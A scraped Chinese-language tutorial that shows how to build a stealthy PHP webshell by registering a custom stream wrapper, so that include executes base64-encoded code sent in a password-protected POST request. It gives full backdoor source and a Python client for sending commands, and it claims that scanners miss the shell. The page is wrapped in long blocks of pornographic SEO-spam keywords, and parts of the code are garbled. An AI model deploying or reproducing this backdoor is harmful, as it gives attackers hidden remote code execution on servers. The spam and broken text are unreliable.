婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > PHP使用流包裝器實現WebShell的方法

PHP使用流包裝器實現WebShell的方法
熱門標簽:電信外呼系統多少錢一個月 桂陽公司如何做地圖標注 合肥企業外呼系統線路 代理打電話機器人 太原400電話申請流程 萍鄉商鋪地圖標注 企業400電話辦理多少費用 神龍斗士電話機器人 宿州正規外呼系統軟件

0×00 前言

在Web安全領域WebShell的構造與查殺是永不停息的話題,這幾天發現了一種新型方式生成WebShell,隱蔽度高,目前安全查殺軟件沒法檢測到相關的后門漏洞,不同于 eval 或則 asset 等方式運行后門,對于這兩個函數禁用的情況下一樣適用,目前除了禁用相關函數還暫時沒有相關方式來避免漏洞。

0×01 后門原理

在PHP開發中,我們使用最為頻繁的指令大概就是 include 指令, include 指令中一些比較普通的文件包含漏洞我們就忽略了,先來看看一串代碼:

include 'http://www.test.com/code.php'

我們通過這一串代碼可以很容易的引用外部的PHP程序,但是前提是配置文件允許該行為被執行,先看看我的配置項

;;;;;;;;;;;;;;;;;;
; Fopen wrappers ;
;;;;;;;;;;;;;;;;;;
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-fopen
allow_url_fopen =Off
; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
; http://php.net/allow-url-include
allow_url_include = Off

從配置文件可以看到,allow_url_include 被我關閉了,也就是包含遠程代碼是不可能執行的,但是我們這里利用了一個東西。http:// 流,我們知道,在PHP中很多東西都是可以通過流包裝器來使用的,比如常見的 php:// 流,我們可以通過 php://input 來獲取輸入流來讀取請求體的內容,那么根據這個思路,我們能不能通過流包裝器來實現代碼執行?答案是可行的 通過PHP函數 stream_wrapper_register 注冊包裝器,檢測特定的URL包裝功能,監控 include 流,在 include 流中動態生成PHP代碼,我將通過如下代碼執行一個 hello world 程序來證明這個過程

include 'hello://dxkite';

Hello Stream Wrapper 的實現

code = "position = 0;
  return true;
 }
 public function stream_read($count)
 {
  $ret = substr($this->code, $this->position, $count);
  $this->position += strlen($ret);
  return $ret;
 }
 public function stream_tell()
 {
  return $this->position;
 }
 public function stream_eof()
 {
  return $this->position >= strlen($this->code);
 }
 public function stream_seek($offset, $whence)
 {
  switch ($whence) {
   case SEEK_SET:
    if ($offset  strlen($this->code)  $offset >= 0) {
     $this->position = $offset;
     return true;
    } else {
     return false;
    }
    break;
   case SEEK_CUR:
    if ($offset >= 0) {
     $this->position += $offset;
     return true;
    } else {
     return false;
    }
    break;
   case SEEK_END:
    if (strlen($this->code) + $offset >= 0) {
     $this->position = strlen($this->code) + $offset;
     return true;
    } else {
     return false;
    }
    break;
   default:
    return false;
  }
 }
 public function stream_stat()
 {
  return stat(FILE);
 }
}
stream_wrapper_register('hello', HelloStream::class);
include 'hello://dxkite';

通過如上的代碼,經過執行后,可以輸出一個 hello worldHelloWorld

 

0×02 后門示例

通過上述程序,我們實現了通過 include 指令直接執行 php ,并插入我們想要的效果,我們現在根據這個原理寫一個Shell:

后門程序

@link //dxkite.cn
 */
class ShellStream
{
 protected $position;
 protected $code;
 public function stream_open($path, $mode, $options, $opened_path)
 {
  $url = parse_url($path);
  $name = $url["host"];
  $this->code = base64_decode($name);
  $this->position = 0;
  return true;
 }
 public function stream_read($count)
 {
  $ret = substr($this->code, $this->position, $count);
  $this->position += strlen($ret);
  return $ret;
 }
 public function stream_tell()
 {
  return $this->position;
 }
 public function stream_eof()
 {
  return $this->position >= strlen($this->code);
 }
 public function stream_seek($offset, $whence)
 {
  switch ($whence) {
   case SEEK_SET:
    if ($offset  strlen($this->code)  $offset >= 0) {
     $this->position = $offset;
     return true;
    } else {
     return false;
    }
    break;
   case SEEK_CUR:
    if ($offset >= 0) {
     $this->position += $offset;
     return true;
    } else {
     return false;
    }
    break;
   case SEEK_END:
    if (strlen($this->code) + $offset >= 0) {
     $this->position = strlen($this->code) + $offset;
     return true;
    } else {
     return false;
    }
    break;
   default:
    return false;
  }
 }
 // include
 public function stream_stat()
 {
  return stat(FILE);
 }
 // file exists
 public function url_stat(string $path,int $stat)
 {
  return stat(FILE);
 }
 public static function shell(){
  stream_wrapper_register('shell', ShellStream::class);
  if (isset($_POST['password'])  $_POST['code']) {
   if ($_POST['password']=='dxkite') {
    $code = $_POST['code'];
    include 'shell://'.$code;
   } else {
    include 'shell://PD9waHAgZWNobyAiaGVsbG8gaGFjayI7';
   }
  }
 }
}

ShellStream::shell();

 

上述我實現了一個使用 $_POST 作為輸入,接收密碼和php代碼的base64并執行代碼的后門利用程序

import requests 
import base64
import sys
def send_raw(url,password,cmd):
 res=requests.post(url,{
  'password':password,
  'code': base64.b64encode(cmd.encode('utf-8')) 
 })
 return res.text
def send_php_shell(url,password,cmd):
 return send_raw(url,password,'')
  if cmd == 'exit':
   break
  elif cmd.startswith('run'):
   cmd,path = cmd.split(' ',1)
   code = ''
   with open(path) as f:
    for line in f:
     code = code + line + "\r\n" 
   response = send_raw(url,password,code);
   print(response)
  else:
   response = send_php_shell(url,password,cmd);
   print(response)

我們把我們的 shell.php 部署到服務器上,執行測試 shell.py :

php-shell.png

其中,test.php 的內容為:

?php
 include 'PD9waHAgZWNobyAiaGVsbG8gc2hlbGxcclxuIjs';
 echo 'hello, shell world';

0×03 后門查殺

百度在線掃描

 

安全狗本地掃描

 

總結

以上所述是小編給大家介紹的PHP使用流包裝器實現WebShell的方法,希望對大家有所幫助,如果大家有任何疑問歡迎給我留言,小編會及時回復大家的!

您可能感興趣的文章:
  • php木馬webshell掃描器代碼
  • 精確查找PHP WEBSHELL木馬 修正版
  • 精確查找PHP WEBSHELL木馬的方法(1)
  • PHP webshell檢查工具 python實現代碼
  • phpMyAdmin 后臺拿webshell

標簽:崇左 白銀 太原 廊坊 辛集 綏化 衡陽 鄂州

巨人網絡通訊聲明:本文標題《PHP使用流包裝器實現WebShell的方法》,本文關鍵詞  PHP,使用,流,包裝,器,實現,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《PHP使用流包裝器實現WebShell的方法》相關的同類信息!
  • 本頁收集關于PHP使用流包裝器實現WebShell的方法的相關信息資訊供網民參考!
    • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    国产亚洲欧美日韩俺去了| 久久综合久久99| 精品一区二区三区免费观看| 一区二区三区毛片| 国产精品不卡一区| 亚洲精品欧美在线| 亚洲一区二区四区蜜桃| 亚洲精品成人精品456| 亚洲欧美一区二区三区孕妇| 一区二区免费在线播放| 亚洲精品国产精品乱码不99| 亚洲小少妇裸体bbw| 午夜精品免费在线观看| 日韩成人伦理电影在线观看| 美女一区二区在线观看| 国内欧美视频一区二区| 国产成人欧美日韩在线电影| 成人精品国产福利| 欧美亚洲图片小说| 欧美电影免费观看高清完整版在线 | 国产一区二区三区免费看 | 麻豆免费看一区二区三区| 久久69国产一区二区蜜臀| 国产91丝袜在线观看| 91丨九色丨黑人外教| 欧美日本国产一区| 26uuu国产电影一区二区| 国产精品久久午夜| 蜜桃久久久久久久| 99在线热播精品免费| 51精品久久久久久久蜜臀| 欧美精品一区二| 亚洲欧美日韩国产一区二区三区 | 9久草视频在线视频精品| 在线日韩国产精品| 欧美tk—视频vk| 亚洲欧美日韩在线不卡| 国内精品免费**视频| 欧美日韩一区国产| 欧美国产亚洲另类动漫| 日韩不卡在线观看日韩不卡视频| 高潮精品一区videoshd| 欧美日韩精品一区二区天天拍小说| 欧美xxxx老人做受| 亚洲成av人在线观看| 成人黄色软件下载| 26uuu国产一区二区三区 | 精品国产亚洲在线| 一区二区三区免费网站| 成人手机在线视频| 欧美精品一区二区在线播放| 午夜视频一区在线观看| 色先锋aa成人| 中文字幕亚洲一区二区va在线| 男男视频亚洲欧美| 欧美日韩不卡一区二区| 亚洲精品国产一区二区精华液| 国产精品白丝jk黑袜喷水| 5月丁香婷婷综合| 亚洲国产精品一区二区www在线| av电影天堂一区二区在线| 久久久精品2019中文字幕之3| 日韩电影免费在线| 欧美偷拍一区二区| 亚洲资源中文字幕| 色成人在线视频| 亚洲精品高清视频在线观看| 97se亚洲国产综合自在线| 国产精品人成在线观看免费| 91网站最新网址| 国产精品久久午夜| 99re这里都是精品| 国产精品福利一区| 色94色欧美sute亚洲13| 亚洲午夜av在线| 欧美精品v国产精品v日韩精品| 亚洲一区自拍偷拍| 777欧美精品| 狠狠色丁香久久婷婷综合丁香| 日韩亚洲欧美一区二区三区| 琪琪一区二区三区| 2014亚洲片线观看视频免费| 国产精品一区二区三区四区| 国产精品视频看| 色综合久久88色综合天天6| 夜夜精品浪潮av一区二区三区| 欧美三日本三级三级在线播放| 无吗不卡中文字幕| 日韩视频一区在线观看| 国产精品一区二区91| 中文字幕色av一区二区三区| 在线观看一区日韩| 精品在线视频一区| 一区视频在线播放| 欧美日韩成人综合天天影院| 久久er精品视频| 中文字幕不卡在线观看| 欧美色中文字幕| 国产真实乱子伦精品视频| 亚洲欧洲www| 日韩欧美资源站| 91美女视频网站| 奇米色一区二区| 日韩一区有码在线| 欧美一区二区在线播放| 成人免费高清在线观看| 天堂精品中文字幕在线| 久久久久久久久久美女| 在线视频综合导航| 国产在线精品免费| 亚洲国产精品一区二区www在线| 久久亚洲私人国产精品va媚药| 色综合久久中文综合久久97| 激情av综合网| 午夜一区二区三区视频| 国产精品久线观看视频| 日韩午夜中文字幕| 欧美主播一区二区三区美女| 国产在线视频精品一区| 亚洲一区二区三区美女| 久久久久久夜精品精品免费| 91麻豆精品国产| 日本久久电影网| 成人毛片在线观看| 国产在线视视频有精品| 午夜电影网亚洲视频| 亚洲黄色尤物视频| 国产视频视频一区| 精品国内二区三区| 制服丝袜亚洲播放| 欧美色图一区二区三区| 91免费看`日韩一区二区| 国产不卡视频一区| 国产综合色在线| 久久国产精品第一页| 日韩电影一二三区| 日日摸夜夜添夜夜添精品视频 | 精品一区二区久久久| 亚洲国产一区二区在线播放| 亚洲精品视频观看| 亚洲三级在线免费观看| 国产精品久久久久三级| 国产精品久久久久久久岛一牛影视| 久久色在线视频| 欧美精品一区二区三区高清aⅴ| 欧美福利一区二区| 日韩一区二区在线免费观看| 欧美一区二区成人6969| 欧美一区二区三区在线观看| 91精品国产综合久久久久| 欧美一区二区在线免费观看| 欧美一级专区免费大片| 97精品视频在线观看自产线路二| 成人免费视频一区| 国产一区二区三区| 国产精品888| 成人午夜视频免费看| 成人免费精品视频| 色综合天天综合网国产成人综合天| eeuss国产一区二区三区| 91丝袜呻吟高潮美腿白嫩在线观看| 99久久99久久精品国产片果冻| 懂色av噜噜一区二区三区av| 99精品欧美一区二区蜜桃免费| 97aⅴ精品视频一二三区| 欧美丝袜丝交足nylons图片| 欧美乱妇15p| 久久无码av三级| 亚洲色图色小说| 日本va欧美va瓶| 国产精品91xxx| 在线中文字幕一区二区| 欧美日韩激情一区二区| 久久嫩草精品久久久精品| 亚洲欧美怡红院| 亚瑟在线精品视频| 国产精一品亚洲二区在线视频| 不卡一区中文字幕| 欧美在线综合视频| 国产亚洲va综合人人澡精品 | 精品在线播放免费| 粉嫩欧美一区二区三区高清影视| 99久免费精品视频在线观看| 91精品国产一区二区三区| 国产欧美精品在线观看| 一区二区三区产品免费精品久久75| 日本aⅴ免费视频一区二区三区| 成人v精品蜜桃久久一区| 91精品视频网| 亚洲美女免费视频| 国产一区二区精品久久99| 91福利国产精品| 久久久久久久久久久久久女国产乱| 洋洋av久久久久久久一区| 国产激情一区二区三区| 7777精品伊人久久久大香线蕉的 | 精品一区二区在线免费观看| 色综合久久久久综合体| 国产亲近乱来精品视频| 青青国产91久久久久久|